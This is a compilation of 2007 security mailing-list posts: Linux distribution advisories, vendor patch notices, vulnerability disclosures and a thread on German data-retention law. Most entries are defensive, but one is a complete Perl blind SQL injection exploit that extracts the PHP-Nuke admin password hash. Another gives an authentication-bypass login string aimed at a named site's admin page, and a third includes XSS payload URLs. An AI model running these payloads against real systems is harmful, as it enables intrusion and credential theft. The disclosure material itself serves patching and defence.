-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0067-1 Published: 2007-11-11 Rating: Minor Updated Versions: pidgin=/[EMAIL PROTECTED]:1-devel//1/2.2.2-1-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-3 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4999 http://www.pidgin.im/news/security/?id=24 Description: Previous versions of pidgin are vulnerable to a denial-of-service when pidgin has been configured to use HTML logging. Logging is not enabled by default, so the default install of Foresight Linux is not vulnerable to this issue. - --- Copyright 2007 Foresight Linux Project This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) iQIVAwUBRzfdX9fwEn07iAtZAQKuWxAAwT3oV9yX5ux93HpFgVDjQI6KJ3g2sFJ/ NiLGdQHbnxEqtry/T0vgalw8Rsh/HNcd8jEAEBxe+wHZKjY0CiaTDmA5/76UItWq hov1gc+0KNeWF0aUn/3qDfvrSFzpaa9s/1WM4yEsQNAKSz5X78m5QS0QnEBI+4lA HTPbKjQp/tsEpZxt3/1JFIEZwlKDgyJoq/JyH2JE0l+kYVFQ4hXeRWwJbGFx1jTJ iwLOzgBxpJ8pn+iZJtaHif/CO1JsdVZ6n5T6k+n/r9kc3Hs5yqLaUeLaREQyUi+P U5Y6tu27OU0CJ7SZITMtsqRbIibzvVQuQvZQvIYruyIjeukGeaTgcOj0QzycF5Wl jqby6cf1fwdHLXXxdkyYiK+2eklrBLJG0Sbxlt4l9v3eL8lUAlSHTfHSwn4sKxg9 OYBgixcrU0zxcKDlai/EiXmHElorXtCaIYlDaIeunK5uF/VyBOgMhUvlMmkXHWY9 I+a8kn6ita/ulDUKJBaCmgm36MsS9ChfCSMErZQTxNbTFhPUS1jOj8rErE4hgGgo AHXDzlbeB1YhpsuKlIAelZFOjCNaaNy4H52tQlK+m7WUdXbwz34JrL6GB2GuR4ir 2+0kjjLszBki0sosjl3/yuE0uKpB1Xch4yr/KjhmqtMvnRAEElWe8QMc8t1kVeoi aOljymBtaXU= =bzoP -END PGP SIGNATURE-
FLEA-2007-0064-1 pcre
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0064-1 Published: 2007-11-11 Rating: Moderate Updated Versions: pcre=conary.rpath.com at rpl:1/7.4-0.2-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-3 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1659 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1660 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1661 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1662 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4766 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4767 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4768 Description: Previous versions of the pcre package contain multiple vulnerabilities which may allow an attacker to execute arbitrary code. The pcre library and utilities are not known to be exposed via any privileged or remote interfaces within Foresight Linux by default, but many applications linked to the pcre library are routinely exposed to untrusted data. - --- Copyright 2007 Foresight Linux Project This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) iQIVAwUBRzfaAtfwEn07iAtZAQL4mQ//bynB+4Aj7mzUQGP57+uL1Lz2vRnzDneF DX60BQ1yAlFAxkXVJWDw2xiOVvqzN5urnXsKhmUej6+TPHmNnYOXKsJ5s6Aq2z2r zKaSOlQEAwNMQZ9LxkRoAOe4im7paLpkSlOIFDy3XG33R9zfDAT+ifsmWETCmzue MD0WuXgC5h3/TipNnxtyAm/q8ImLKV2Xng/GEAPSTzcAcqojUXyKgSyTr14dQ66/ yIE2q4NcAVyJ/H6LQQmmqcAtXxBvLw55jMtiSOXdjEHpkwM/6+d2YAPAwaDBowfr tD90tVi7h+pX8Zph7mG0QFSW3qfNSDhDZEvxq7LMTwnMQ/cID6E5O+ZTw3cdkp2R b97iPJGZcodI6RoO+XHCWqaSrtFuMeuTL4sKoYsYY7iCc0ebht/67aTaOKK0yrrw e2locTPIOIZ2u9yqfjZPH5Vwf+zoDuyVWBPHWx1i3MC0O/Zu1//dgqqZDY/eGFBe db3EHUqr1qJsCjZPG136jhtCuJMflAJM2cGdDDcy5ojVNPy/Vt019PAVRYOjnVpU kM0/qKkZzg0c4Yx1UM63fA1JfXRlOiZ9UY0zaOU8F+a5d7A+s8V5HcfrFt2WbLNg 1uRlVmkWj7vMU4JJzl3EUqtPwUq8zWaj34id+w3SobKbIopCc98ZDOgUuCNLGvSe Kpr7fv9nBtc= =RTMx -END PGP SIGNATURE-
CVE-2007-3694: Cross site scripting (XSS) in broadcast machine
Source: http://int21.de/cve/CVE-2007-3694-bm.html Cross site scripting (XSS) in broadcast machine References http://www.getmiro.com/create/broadcast/ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3694 Description Cross site scripting describes attacks that allow to insert malicious html or javascript code via get or post forms. This can be used to steal session cookies. Broadcast machine is a web-based video platform tool. It's login form is vulnerable to XSS. Sample code http://somesite.com/login.php"; method="post"> Workaround/Fix Vendor consideres broadcast machine dead software and won't provide any updates. However it's still used on some live sites in the internet. CVE Information The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3694 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. Credits and copyright This vulnerability was discovered by Hanno Boeck of schokokeks.org webhosting. It's licensed under the creative commons attribution license. Hanno Boeck, 2007-11-12, http://www.hboeck.de signature.asc Description: This is a digitally signed message part.
PHP-Nuke Module Advertising Blind SQL Injection
#!/usr/bin/perl
#Product: PHP-Nuke Module Advertising
#BugFounder: 0x90
#HomePage: WwW.0x90.COM.Ar
#Problem: Blind SQL Injection
use strict;
use warnings;
use LWP;
use Time::HiRes;
use IO::Socket;
my $host = "http://[url]/modules.php?name=Advertising";;
my $useragent = LWP::UserAgent->new;
my $metodo = HTTP::Request->new(POST => $host);
my $post;
my $inicio;
my $risposta;
my $fine;
my $tiempodefault;
my $tiempo;
my $i;
my $j;
my $hash;
my @array;
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
$post="login=a&pass=a&op=client_valid";
$tiempodefault=richiesta($post);
$hash="";
#QUERY RISULTANTE
#SELECT * FROM nuke_banner_clients WHERE login='a' UNION SELECT 0,0,0,0,0,0,
IF((ASCII(SUBSTRING(`pwd`,1,1))=112),benchmark(2,CHAR(0)),'falso') FROM
nuke_authors WHERE `radminsuper`=1/*
for ($i=1;$i<33;$i++)
{
for ($j=0;$j<16;$j++)
{
$post="login=a' UNION SELECT 0,0,0,0,0,0, IF((ASCII(SUBSTRING(`pwd`," . $i .
",1))=".$array[$j]."),benchmark(2,CHAR(0)),'falso') FROM nuke_authors
WHERE `radminsuper`=1/*&pass=a' UNION SELECT 0,0,0,0,0,0,
IF((ASCII(SUBSTRING(`pwd`," . $i .
",1))=".$array[$j]."),benchmark(2,CHAR(0)),'falso') FROM nuke_authors
WHERE `radminsuper`=1/*&op=client_valid";
$tiempo=richiesta($post);
aggiorna($host,$tiempodefault,$j,$hash,$tiempo,$i);
if($tiempo>10)
{
$tiempo=richiesta($post);
aggiorna($host,$tiempodefault,$j,$hash,$tiempo,$i);
if($tiempo>10)
{
$hash .=chr($array[$j]);
aggiorna($host,$tiempodefault,$j,$hash,$tiempo,$i);
$j=200;
}
}
}
if($i==1)
{
if($hash eq "")
{
$i=200;
print "El atake Fallo\n";
}
}
}
print "Atake Terminado\n\n";
system("pause");
sub richiesta{
$post=$_[0];
$metodo->content_type('application/x-www-form-urlencoded');
$metodo->content($post);
$inicio=Time::HiRes::time();
$risposta=$useragent->request($metodo);
$risposta->is_success or die "$host : ",$risposta->message,"\n";
$fine=Time::HiRes::time();
$tiempo=$fine-$inicio;
return $tiempo
}
sub aggiorna{
system("cls");
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
print "PHP-Nuke Module Advertising Blind SQL Injection\n";
print "by 0x90\n";
print "Visit: WwW.0x90.CoM.Ar\n\n";
print "Victima : " . $_[0] . "\n";
print "Tiempo Default : " . $_[1] . " secondi\n";
print "Hash Bruteforce : " . chr($array[$_[2]]) . "\n";
print "Bruteforce n Caracter Hash : " . $_[5] . "\n";
print "Tiempo sql : " . $_[4] . " secondi\n";
print "Hash : " . $_[3] . "\n";
}
PeopleAggregatory security advisory - re CVE-2007-5631
Hi all, This is a notification that the remote file inclusion vulnerabilities reported in CVE-2007-5631 have been fixed in PeopleAggregator v1.2pre6-release-55, and are not exploitable if PHP's register_globals directive is disabled. CVE entry: http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-5631 - Multiple PHP remote file inclusion vulnerabilities in PeopleAggregator 1.2pre6 allow remote attackers to execute arbitrary PHP code via a URL in the current_blockmodule_path parameter to (1) AudiosMediaGalleryModule/AudiosMediaGalleryModule.php, (2) ImagesMediaGalleryModule/ImagesMediaGalleryModule.php, (3) MembersFacewallModule/MembersFacewallModule.php, (4) NewestGroupsModule/NewestGroupsModule.php, (5) UploadMediaModule/UploadMediaModule.php, and (6) VideosMediaGalleryModule/VideosMediaGalleryModule.php in BetaBlockModules/; and (7) the path_prefix parameter to several components. - Notes from vendor: To be exploitable, the web server must be configured with PHP's register_globals directive ON. To fix a vulnerable installation, either turn register_globals OFF in php.ini or via the php_flag Apache option, or upgrade to v1.2pre6-release-55. Advisory blog post: http://www.myelin.co.nz/post/2007/11/12/#200711121 Upgrade instructions: - If installed via Subversion, 'svn update' in the root of your PeopleAggregator install. - If installed via tarball, download the latest tarball from http://update.peopleaggregator.org/dist/peopleaggregator-1.2pre6-release- 55.tar.gz and copy all files over those from your existing installation. Regards, Phillip Pearson Broadband Mechanics
FLEA-2007-0068-1 ruby
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0068-1 Published: 2007-11-11 Rating: Minor Updated Versions: ruby=/[EMAIL PROTECTED]:devel//1/1.8.6_p110-1-0.1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-3 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5162 Description: Previous versions of the ruby package include a library, Net::HTTPS, which does not properly verify the CN (common name) field in ssl certificates, making it easier to perform a man-in-the-middle attack. It is believed that Foresight Linux does not include any programs which rely on this feature of the Net::HTTPS library, and so is not affected by default. - --- Copyright 2007 Foresight Linux Project This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) iQIVAwUBRzffzNfwEn07iAtZAQLx/g/8DQHUZnmhYJCYAgiUQsN5PGTbBEWpZdN4 VxaCBPxhZL378cl4r/eBc4+CH/nni+dOlea/MVRMhKYxtERt5LnM79fa2ur2uIdk Vt8QKACYe52OltlPw3kAgdDeVVlWZnyYl2V9Py+dMgwRdrcWiyv0RAuc8FQYUc7w z2ROUIyPXlVU0a2/LTvkIyQigfugQVSlRtmTqVDZIeAYn1W4u8u8nw3MjcX4Vz+H 78IEB82yxuTzKBwj+tXldZmb4iecVYiAFYddPQNjcYMEZBPaysQCp9dE/aPE3Odq ncKBqNTsnbWJxICLlxMFx0O/iF/dBHQVgd5KhXcdgQZPIPzc7FdJW3AjNv4YSIcW V3CTt8WHbUDn1b9XKHMQ0sCOkOsrPgWwuJk2POYjfJWAvY8HcSid0RTbBylEsNIj D0aVRY7ykhn36xTmRtrCqlIJZ6vBCWgnhMKdTZ16dcN2YzyzapflQZ0AD1D0p3xQ OWjVMgotP8ZNotNsVLctigyC836Bpqu2XrKFY5lSvRcrS8TcHr/JeSwSdnEjjwTO 8Mai0QNYYa3cULXpRQSFbt8q1A3UZ3QZMGE+EvUAhYTsxRAnPgAjsS31v/qLIfe7 SIzIJwIHLrZTk/SMz6bFC9BjJ1ybUR1RA47pCmNOkVjQaudttqRJiLq1TtXh/I/Q V1w0i/aDmGc= =Dd9Q -END PGP SIGNATURE-
Re: [Full-disclosure] Standing Up Against German Laws - Project HayNeedle
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Paul Sebastian Ziegler wrote: > > Dear Infosec community, > > > > as most of you may have heard the German government passed a law today > > that will lead to all connections being logged for 6 months. This > > includes phone calls as well as all internet connections. NO! This is totally WRONG! The only thing which is logged, in the case of internet connectivity, is your IP you got from the ISP. Not even connections are logged! This is important to understand since many people are misinformed this way. Read http://www.vorratsdatenspeicherung.de/content/view/78/86/lang,de/#Umsetzung_in_Deutschland greetz Jan
Standing Up Against German Laws - Project HayNeedle
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Dear Infosec community, as most of you may have heard the German government passed a law today that will lead to all connections being logged for 6 months. This includes phone calls as well as all internet connections. This is madness for various apparent reasons. In times like these it is necessary to stand up against it. Of course not by committing crimes but by attacking the flawed logic behind those laws itself. There are many approaches to this. And I am sure (and I really hope) that there will be many more taken. This is just one approach that came to my mind today. Introducing Project HayNeedle. A tiny spider-like program written in C# that will create connection sessions on it's own thus trying to create plausible deniablility. It runs within the .NET framework and was tested on Linux and Windows XP. If it runs on your OS, drop me a line, if it doesn't send me a report. It should run on almost any OS supporting Mono. The mechanism is quite easy: It searches Google for random words and picks random pages among the results, then spiders from there (well it is spidering except that it only follows one URL at a time within a session thus simulating a user). A long description of the idea behind it and the technique as well as downloads of the sourcecode and binary can be found here (English and German version): http://observed.de/?entnum=126 Project HayNeedle is released under the GPLv2. So any form of patches, ideas and constructive criticism is welcome. However for the sake of everyones nerves I will not reply to any sort of aggressive and/or flaming mails. Many Greetings Paul Sebastian Ziegler -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHNepUaHrXRd80sY8RCqprAKC/8EVMf/FVibcyLWc1ksnq9ZRT7ACg9FpS 4JpBVvHE1TI3ZPkvgSPXuGA= =g7Qt -END PGP SIGNATURE-
Oracle 0-day to get SYSDBA access
Tanel Poder has found a way to get SYSDBA access to the Oracle database by utilising a user who has the BECOME USER system privilege, execute privileges on KUPP$PROC.CHANGE_USER and CREATE SESSION. he shows how a user with these privileges can become SYS (but not SYSDBA) and then use an immediate debug event to cause a debugger to flip the SYSDBA bit in the PGA to set a dedicated server session to an SYSDBA one, from there the user can do anything else. The user needs to have these privileges so its not an open and shut case but serious in that a privilege escalation is still possible. Tanels post is here http://blog.tanelpoder.com/2007/11/10/oracle-security-all-your-dbas-are-sysdbas-and-can-have-full-os-access/ and my blog entry / analysis is here - http://www.petefinnigan.com/weblog/archives/1126.htm cheers Pete
FLEA-2007-0066-1 ImageMagick
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0066-1 Published: 2007-11-11 Rating: Moderate Updated Versions: ImageMagick=/[EMAIL PROTECTED]:1-devel//1/6.3.6.9-1-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-3 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4985 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4986 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4987 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4988 Description: Previous versions of the ImageMagick package are vulnerable to multiple attacks whereby an attacker might be able to execute arbitrary code by coercing the user into opening specially-crafted files with ImageMagick. - --- Copyright 2007 Foresight Linux Project This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) iQIVAwUBRzfcadfwEn07iAtZAQJrlA/8DY4HtEoTS1Iy45KtUA01LwEFDAMXdXmY WqVDVS/zQ6UIFwafRZKSPyK4eNOAqmHg/N5IoWjckXv3KU8kFNkl8zgsQy7+FiRN ZUReSeQDS3B/r4SDpkgnI3UnDkC0Y1vpsYLDz2gWSq3+Sq6c9c4lSZyUtS52w1zG 6wETgXmwZWVyV/vyEZ2PRk974YPrDB8iildAR6T3HIMBi+tnndIFa9iMe6tBiQvK UAzCZmHeQB0U9MTSdG/hPhEP7gNRpoeFqzCxtjiyxx2oM8D2UCBExmLUuhi3kZ0L 1sxLY9QTa1mYmx1TND2ZNVc8AKpXO6FGnUcKe7eJ+rVsUSzgZd67cnLiW6PX/zfa lDz6sTSB637/sq0vhi72CAs8j6A5GV3jcCaHFjJZtDBFMlemid0a2VO2sM8eP4UH 5n/uzRntt2OMKy/yjhbVXzO1SG1thQH7ql/z6SyM8GKD7d6qZ+Hekq9iJKL8RR3W H6lXkEYEIDm4mQrJCreQA8UXpLvc/b628SY+oHAaYv6VcDVahlBweEV8o7nMmgUy LPFYJw62IDOCjThgFEJLfpdGZA/37OpOrPnfoGtR7Rl/MkR+nwsTsvo4j1cHB+pP yGncgeCR39u+aeStQcAfrM+dPFGgb/cDNbByEHqulCq3SGNx1MTgCSoGPteBq8UU 2Vx4mW75h3I= =2VH9 -END PGP SIGNATURE-
FLEA-2007-0063-1 perl
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0063-1 Published: 2007-11-09 Rating: Minor Updated Versions: perl=/[EMAIL PROTECTED]:devel//1/5.8.7-8.2-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-2 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116 Description: Previous versions of the perl package contain weaknesses when evaluating regular expressions. If a system is serving a perl-based web application that evaluates remote input as a regular expression, an attacker may be be able to exploit these weaknesses to execute arbitrary, attacker-provided code on the system, potentially elevating this to a remote, deterministic unauthorized access vulnerability. Foresight Linux does not, by default, enable or contain any such services. - --- Copyright 2007 Foresight Linux Project This file is distributed under the terms of the MIT License. A copy is available at http://www.foresightlinux.org/permanent/mit-license.html -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.7 (GNU/Linux) iQIVAwUBRzVJ3tfwEn07iAtZAQLGlQ//ZaOxxdDrbgVBDfnrRZ2E8AAY4wlT2x2w iI1ATK2PyHKRaMk+8hOskweQjxlQc3C4An6ff/wBCPpIzdG3rufsZCQ5YLwUVX0G InY9wFWKcE7LqUjp8l+lnBQyXf7po/LLppgwOR6ccMIxI44JbL/jcxfOT9EbO1bU fvEpzfokfH08j07wwX3ReNWA6xyO2SuWTiXSchUNGnYqNZeOJ115SdPKQC8I8jvi qhw/HLH96FCK19sigW+ELCcuWHdCKvUYVcSYTwXK/zGcMyr9IV4mgJiF0of7l7il ADYMYfT28JpkpdNXuOasfE8s7MNlEQ8wVqbbZt40je0OaoTTc/eslqf3JOlyvKZW 8b/WtYgZ1asgEHp3puTcl6e1EYpdf+Yg61RLVZiZ6W4UpFFgut97jp90yY3cR3C2 4v3C5978JQPGKMFhdB93YNE60fh3KdDWPutR34VwFEuhf50vRkND9++5uhmymtLG 0+vz/7QxoM3fTUuCUZLoPH+qJUYo+HwuasPmWUEyKpqrOT0eBnmZKh33/WHl3uo5 apyD9GgFl8bZjuVsTzirXh0JrLUNj4QWb22snEp9ZU/5uoJ0IaqWX++9jQGoJ+7V VIlfXilU0r8UeorVRuv3+HXDbHRbLnpuVhHTMq6Q1E4brux0Y8NOMxNdJq2UHuFU UVdaBJzKoMw= =Vbpl -END PGP SIGNATURE-
Eggblog v3.1.0 XSS Vulnerability
H - Security Labs
Eggblog v3.1.0 Security Advisory
ID : HSEC#2007
General Information
--
Name : EggBlog v.3.1.0
Vendor HomePage :http://sourceforge.net/projects/eggblog/
Platforms: PHP && MySQL
Vulnerability Type : Input Validation Error
Timeline
-
08 October 2007 -- Vendor Contacted
30 October 2007 -- Vendor Replied
11 November 2007 -- New Release
11 November 2007 -- Advisory Released
What is Eggblog
eggblog is a free PHP & MySQL blogging package. Features include an internal
search engine,
photo albums, forums, plug-ins, guest comments to blog articles, automatic
monthly archiving
of blog articles and RSS XML feeds for both the blog and forums.
I discovered the security holes when I was testing it for my personel web blog.
Vulnerability Overview
The script is vulnerable to XSS attacks.
Details About Vulnerability
XSS Vulnerability(home/rss.php)
At the rss.php line 6-7; there are unfiltered PHP_SELFs that can be used for
XSS attacks.
-
".$_SERVER['SERVER_NAME'].str_replace("/home/rss.php","",$_SERVER['
PHP_SELF'])."/rss/blog.php
".$_SERVER['SERVER_NAME'].str_replace("/home/rss.php","",$_SERVER
['PHP_SELF'])."/rss/topics.php
-
The attacker can succesfully launch XSS attacks with loading payload on to the
URL after the
home\rss.php. For example :
http://www.example.com/home/rss.php/alert(1)
Solutions
---
Download the new release : EggBlog v3.1.1
Credits
---
The vulnerabilities found on 08 October 2007
by Mesut Timur <[EMAIL PROTECTED]>
H - Security Labs , http://www.h-labs.org
Gebze Institue of Technology,Computer Engineering,http://www.gyte.edu.tr
References
---
http://sourceforge.net/forum/forum.php?forum_id=753622
http://www.eggblog.net
http://sourceforge.net/projects/eggblog/
Original Advisory :
http://www.h-labs.org/blog/2007/11/11/eggblog_v3_1_0_xss_issues.html
Mesut TIMUR
http://www.h-labs.org
H - Security Labs Güvenlik Editörü
GYTE Bilgisayar Mühendisligi
Re: Re: Simple Machine Forum - Private section/posts/info disclosure
So let me get this straight, you are saying that when you search as admin, you can find posts from vip section, that admin can normally access ( what a surprise ), but when you log off, and act as non-logged in user, you cant find them? Or you cant just speak proper english and we cant understand you? ( maybe its problem for czech guys as me or jindrich tho )
[SECURITY] [DSA 1405-2] New zope-cmfplone packages fix regression
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1405-2[EMAIL PROTECTED] http://www.debian.org/security/Thijs Kinkhorst November 11th, 2007 http://www.debian.org/security/faq - -- Package: zope-cmfplone Vulnerability : missing input sanitising Problem-Type : remote Debian-specific: no CVE ID : CVE-2007-5741 Debian Bug : 449523 The zope-cmfplone update in DSA 1405 introduced a regression. This update corrects this flaw. For completeness, the original advisory text below: It was discovered that Plone, a web content management system, allows remote attackers to execute arbitrary code via specially crafted web browser cookies. The oldstable distribution (sarge) is not affected by this problem. For the stable distribution (etch) this problem has been fixed in version 2.5.1-4etch2. For the unstable distribution (sid) this problem will be fixed soon. We recommend that you upgrade your zope-cmfplone package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1-4etch2.dsc Size/MD5 checksum: 1114 c4e8894601f85060c50ba1eb0823097d http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1-4etch2.diff.gz Size/MD5 checksum:11213 fdecf98503f9593ebfea4f286608740e http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1.orig.tar.gz Size/MD5 checksum: 1064993 b48215d46aafa9e1f12196263d86a191 Architecture independent components: http://security.debian.org/pool/updates/main/z/zope-cmfplone/plone-site_2.5.1-4etch2_all.deb Size/MD5 checksum: 9900 d8e5a2a383e6dda0e280a71d050b1338 http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1-4etch2_all.deb Size/MD5 checksum: 1190836 1dae183bffb2bdd44e304cb457edd234 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHNzD2Xm3vHE4uyloRAhoBAJ44YToEKkvSF7mn0YD+ygklkwiaaQCfVjqx otvngW9TchYPo9aJwsWdai8= =hBR8 -END PGP SIGNATURE-
Aria-Security.Net Research: Rapid Classified HotList Image
Aria-Security Team, http://Aria-Security.net --- Shout Outs: AurA, imm02tal Vendor: http://www.freshink.net/rc-links.htm Demo: http://www.lite.freshink.net/admin_logon.asp Google Search: Developed by: GA Soft Username: anything' OR 'x'='x password: anything' OR 'x'='x Regards, The-0utl4w >From Aria-Security.Net
[48Bits Advisory] QuickTime Panorama Sample Atom Heap Overflow
[48bits Advisory] QuickTime Panorama Sample Atom Heap Overflow Abstract: QuickTime is prone to a heap overflow vulnerability when parsing malformed Panorama Sample Atoms, which are used in QuickTime Virtual Reality Movies. This Vulnerability allows attackers to execute code on vulnerable installations. Successful exploitation via Web Browser requires that the attacker should trick the user into visiting a specially crafted webpage. Affected versions : Tested with QuickTime VR extension 7.2.0.240 included with QuickTime Player 7.2 Patched in QuickTime 7.3 Original advisory and analysis at: http://www.48bits.com/advisories/qt_pdat_heapbof.pdf Credit : Mario Ballano from 48bits.com
